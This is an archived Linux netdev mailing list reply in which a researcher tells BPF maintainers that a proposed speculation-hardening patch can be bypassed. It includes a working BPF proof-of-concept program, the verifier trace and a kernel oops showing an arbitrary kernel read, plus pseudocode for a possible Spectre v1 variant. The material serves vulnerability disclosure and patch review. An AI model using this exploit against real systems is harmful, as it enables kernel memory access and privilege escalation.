netdev - Re: [PATCH bpf v3 8/9] bpf: prevent out of bounds speculation on pointer arithmetic

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <CAG48ez3Qwr26xygfsKp-SBM20O5afxQ9EkaYRwcUc9wGLdbFWA@mail.gmail.com>
Date:   Thu, 3 Jan 2019 22:13:44 +0100
From:   Jann Horn <jannh@...gle.com>
To:     Daniel Borkmann <daniel@...earbox.net>
Cc:     Alexei Starovoitov <ast@...nel.org>,
        "David S. Miller" <davem@...emloft.net>,
        jakub.kicinski@...ronome.com,
        Network Development <netdev@...r.kernel.org>
Subject: Re: [PATCH bpf v3 8/9] bpf: prevent out of bounds speculation on
 pointer arithmetic

Hi!

Sorry about the extremely slow reply, I was on vacation over the
holidays and only got back today.

On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@...earbox.net> wrote:
> Jann reported that the original commit back in b2157399cc98
> ("bpf: prevent out-of-bounds speculation") was not sufficient
> to stop CPU from speculating out of bounds memory access:
> While b2157399cc98 only focussed on masking array map access
> for unprivileged users for tail calls and data access such
> that the user provided index gets sanitized from BPF program
> and syscall side, there is still a more generic form affected
> from BPF programs that applies to most maps that hold user
> data in relation to dynamic map access when dealing with
> unknown scalars or "slow" known scalars as access offset, for
> example:
[...]
> +static int sanitize_ptr_alu(struct bpf_verifier_env *env,
> +                           struct bpf_insn *insn,
> +                           const struct bpf_reg_state *ptr_reg,
> +                           struct bpf_reg_state *dst_reg,
> +                           bool off_is_neg)
> +{
[...]
> +
> +       /* If we arrived here from different branches with different
> +        * limits to sanitize, then this won't work.
> +        */
> +       if (aux->alu_state &&
> +           (aux->alu_state != alu_state ||
> +            aux->alu_limit != alu_limit))
> +               return -EACCES;

This code path doesn't get triggered in the case where the same
ALU_ADD64 instruction is used for both "ptr += reg" and "numeric_reg
+= reg". This leads to kernel read/write because the code intended to
ensure safety of the "ptr += reg" case in speculative execution ends
up clobbering the addend in the "numeric_reg += reg" case:

source code:
=============
int main(void) {
  int my_map = array_create(8, 30);
  array_set(my_map, 0, 1);
  struct bpf_insn insns[] = {
    // load map value pointer into r0 and r2
    BPF_LD_MAP_FD(BPF_REG_ARG1, my_map),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -16),
    BPF_ST_MEM(BPF_DW, BPF_REG_FP, -16, 0),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),

    // load some number from the map into r1
    BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_0, 0),

    // depending on R1, branch:
    BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 3),

    // branch A
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
    BPF_MOV64_IMM(BPF_REG_3, 0),
    BPF_JMP_A(2),

    // branch B
    BPF_MOV64_IMM(BPF_REG_2, 0),
    BPF_MOV64_IMM(BPF_REG_3, 0x100000),

    // *** COMMON INSTRUCTION ***
    BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_3),

    // depending on R1, branch:
    BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1),

    // branch A
    BPF_JMP_A(4),

    // branch B
    BPF_MOV64_IMM(BPF_REG_0, 0x13371337),
    // verifier-confused branch: verifier follows fall-through,
runtime follows jump
    BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0x100000, 2),
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),

    // fake-dead code; targeted from branch A to prevent dead code sanitization
    BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_0, 0),
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN()
  };
  int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
  trigger_proc(sock_fd);
}
=============

verifier output:
=============
0: (18) r1 = 0x0
2: (bf) r2 = r10
3: (07) r2 += -16
4: (7a) *(u64 *)(r10 -16) = 0
5: (85) call bpf_map_lookup_elem#1
6: (55) if r0 != 0x0 goto pc+1
 R0=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
7: (95) exit

from 6 to 8: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1
fp-16=mmmmmmmm
8: (71) r1 = *(u8 *)(r0 +0)
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm
9: (55) if r1 != 0x0 goto pc+3
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
10: (bf) r2 = r0
11: (b7) r3 = 0
12: (05) goto pc+2
15: (0f) r2 += r3
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0
R2_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3_w=inv0 R10=fp0,call_-1
fp-16=mmmmmmmm
16: (55) if r1 != 0x0 goto pc+1
17: (05) goto pc+4
22: (71) r0 = *(u8 *)(r0 +0)
 R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0
R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3=inv0 R10=fp0,call_-1
fp-16=mmmmmmmm
23: (b7) r0 = 0
24: (95) exit

from 15 to 16 (speculative execution): safe

from 9 to 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0)
R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R10=fp0,call_-1
fp-16=mmmmmmmm
13: (b7) r2 = 0
14: (b7) r3 = 1048576
15: (0f) r2 += r3
16: (55) if r1 != 0x0 goto pc+1
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=inv1048576
R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
17: (05) goto pc+4
22: safe

from 16 to 18: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0)
R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R2=inv1048576
R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
18: (b7) r0 = 322376503
19: (55) if r2 != 0x100000 goto pc+2
20: (b7) r0 = 0
21: (95) exit
processed 29 insns (limit 131072), stack depth 16
=============

dmesg:
=============
[ 9948.417809] flen=38 proglen=205 pass=5 image=0000000039846164
from=test pid=2185
[ 9948.421291] JIT code: 00000000: 55 48 89 e5 48 81 ec 38 00 00 00 48
83 ed 28 48
[ 9948.424560] JIT code: 00000010: 89 5d 00 4c 89 6d 08 4c 89 75 10 4c
89 7d 18 31
[ 9948.428734] JIT code: 00000020: c0 48 89 45 20 48 bf 88 43 c3 da 81
88 ff ff 48
[ 9948.433479] JIT code: 00000030: 89 ee 48 83 c6 f0 48 c7 45 f0 00 00
00 00 48 81
[ 9948.437504] JIT code: 00000040: c7 d0 00 00 00 8b 46 00 48 83 f8 1e
73 0c 83 e0
[ 9948.443528] JIT code: 00000050: 1f 48 c1 e0 03 48 01 f8 eb 02 31 c0
48 83 f8 00
[ 9948.447364] JIT code: 00000060: 75 16 48 8b 5d 00 4c 8b 6d 08 4c 8b
75 10 4c 8b
[ 9948.451079] JIT code: 00000070: 7d 18 48 83 c5 28 c9 c3 48 0f b6 78
00 48 83 ff
[ 9948.454900] JIT code: 00000080: 00 75 07 48 89 c6 31 d2 eb 07 31 f6
ba 00 00 10
[ 9948.459435] JIT code: 00000090: 00 41 ba 07 00 00 00 49 29 d2 49 09
d2 49 f7 da
[ 9948.466041] JIT code: 000000a0: 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83
ff 00 75 02
[ 9948.470384] JIT code: 000000b0: eb 12 b8 37 13 37 13 48 81 fe 00 00
10 00 75 04
[ 9948.474085] JIT code: 000000c0: 31 c0 eb 9e 48 0f b6 40 00 31 c0 eb 95
[ 9948.478102] BUG: unable to handle kernel paging request at 0000000013371337
[ 9948.481562] #PF error: [normal kernel read fault]
[ 9948.483878] PGD 0 P4D 0
[ 9948.485139] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN
[ 9948.487945] CPU: 5 PID: 2185 Comm: test Not tainted 4.20.0+ #225
[ 9948.490864] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS 1.10.2-1 04/01/2014
[ 9948.494912] RIP: 0010:0xffffffffc01602f3
[ 9948.497212] Code: 49 09 d2 49 f7 da 49 c1 fa 3f 49 21 d2 4c 01 d6
48 83 ff 00 75 02 eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 31
c0 eb 9e <48> 0f b6 40 00 31 c0 eb 95 cc cc cc cc cc cc cc cc cc cc cc
cc cc
[ 9948.506340] RSP: 0018:ffff8881e473f968 EFLAGS: 00010287
[ 9948.508857] RAX: 0000000013371337 RBX: ffff8881e8f01e40 RCX: ffffffff9388f848
[ 9948.512263] RDX: 0000000000100000 RSI: 0000000000000000 RDI: 0000000000000001
[ 9948.515653] RBP: ffff8881e473f978 R08: ffffed103b747002 R09: ffffed103b747002
[ 9948.519056] R10: 0000000000000000 R11: ffffed103b747001 R12: 0000000000000000
[ 9948.522452] R13: 0000000000000001 R14: ffff8881e2718600 R15: ffffc90001572000
[ 9948.525840] FS:  00007f2ad28ad700(0000) GS:ffff8881eb140000(0000)
knlGS:0000000000000000
[ 9948.529708] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 9948.532450] CR2: 0000000013371337 CR3: 00000001e76c5004 CR4: 00000000003606e0
[ 9948.535834] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 9948.539217] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 9948.542581] Call Trace:
[ 9948.543760]  ? sk_filter_trim_cap+0x148/0x2d0
[ 9948.545847]  ? sk_reuseport_is_valid_access+0xa0/0xa0
[ 9948.548249]  ? skb_copy_datagram_from_iter+0x6e/0x280
[ 9948.550655]  ? _raw_spin_unlock+0x16/0x30
[ 9948.552581]  ? deactivate_slab.isra.68+0x59d/0x600
[ 9948.554866]  ? unix_scm_to_skb+0xd1/0x230
[ 9948.556780]  ? unix_dgram_sendmsg+0x312/0x940
[ 9948.558856]  ? unix_stream_connect+0x980/0x980
[ 9948.560986]  ? aa_sk_perm+0x10c/0x3f0
[ 9948.563123]  ? kasan_unpoison_shadow+0x35/0x40
[ 9948.565107]  ? aa_af_perm+0x1e0/0x1e0
[ 9948.566608]  ? kasan_unpoison_shadow+0x35/0x40
[ 9948.568463]  ? unix_stream_connect+0x980/0x980
[ 9948.570397]  ? sock_sendmsg+0x6d/0x80
[ 9948.571948]  ? sock_write_iter+0x121/0x1c0
[ 9948.573678]  ? sock_sendmsg+0x80/0x80
[ 9948.575258]  ? sock_enable_timestamp+0x60/0x60
[ 9948.576958]  ? iov_iter_init+0x86/0xc0
[ 9948.578395]  ? __vfs_write+0x294/0x3b0
[ 9948.579782]  ? kernel_read+0xa0/0xa0
[ 9948.581152]  ? apparmor_task_setrlimit+0x330/0x330
[ 9948.582919]  ? vfs_write+0xe7/0x230
[ 9948.584228]  ? ksys_write+0xa1/0x120
[ 9948.585559]  ? __ia32_sys_read+0x50/0x50
[ 9948.587174]  ? do_syscall_64+0x73/0x160
[ 9948.588872]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 9948.591134] Modules linked in: btrfs xor zstd_compress raid6_pq
[ 9948.593654] CR2: 0000000013371337
[ 9948.595078] ---[ end trace cea5ab7027131bf2 ]---
=============



Aside from that, I also think that the pruning of "dead code" probably
still permits v1 speculative execution attacks when code vaguely like
the following is encountered, if it is possible to convince the CPU to
mispredict the second branch, but I haven't tested that so far:

R0 = <slow map value, known to be 0>;
R1 = <fast map value>;
if (R1 != R0) { // mispredicted
  return 0;
}
R3 = <a map value pointer>;
R2 = <arbitrary 64-bit number>;
if (R1 == 0) { // architecturally always taken, verifier prunes other branch
  R2 = <a map value pointer>;
}
access R3[R2[0] & 1];

To convince the CPU to predict the second branch the way you want, you
could probably add another code path that jumps in front of the branch
with both R2 and R3 already containing valid pointers. Something like
this:

if (<some map value>) {
  R0 = <slow map value, known to be 0>;
  R1 = <fast map value>;
  if (R1 != R0) { // mispredicted
    return 0;
  }
  R3 = <a map value pointer>;
  R2 = <arbitrary 64-bit number>;} else {  R3 = <a map value pointer>;
 R2 = <arbitrary 64-bit number>;  R1 = 1;}
if (R1 == 0) { // architecturally always taken, verifier prunes other branch
  R2 = <a map value pointer>;
}
access R3[R2[0] & 1];